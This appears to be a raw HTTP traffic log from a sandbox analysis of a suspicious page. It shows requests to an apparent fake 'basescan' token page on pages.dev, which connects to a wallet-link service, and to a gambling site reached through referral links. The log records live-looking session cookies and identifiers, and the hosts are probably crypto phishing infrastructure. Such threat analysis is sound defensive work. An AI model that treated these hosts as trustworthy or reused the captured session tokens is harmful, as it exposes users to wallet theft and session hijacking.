__cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /up/asset/dc38ec7be7/2031a41ecc.png?w=728&h=90 HTTP/1.1Host: d107ul3j3wrui0.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /v1/requests HTTP/1.1Host: api.hypelab.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/840013fd8c2ab234.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/index-CrXVjlJA.css HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /cache/game/support/system/conf/ HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /api/account/get/ HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /api/user/amount/ HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /assets/avertastd-mono-extrabold-BWo4zV1n.woff2 HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /assets/avertastd-mono-extrabold-B9YLCmbh.woff HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /rpc HTTP/1.1Host: www.walletlink.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: DzzwodcFzT424Hx7uicjOQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /assets/index-DD2Zk4iT.js HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-url=https%3A%2F%2Fbcgame.sk%2Fi-p3uc729n-n%2F%3Fspin%3Dtrue; invitation-alias-code=p3uc729n; invitation-view-id=1811400572970511703; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg
            Source: global trafficHTTP traffic detected: GET /assets/init/init.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/config.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/init/init.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/index-DD2Zk4iT.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/avertastd-semibold-BC-LINeP.woff2 HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bcgame.sk/assets/index-CrXVjlJA.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/avertastd-extrabold-BtYeKIE6.woff2 HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bcgame.sksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bcgame.sk/assets/index-CrXVjlJA.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
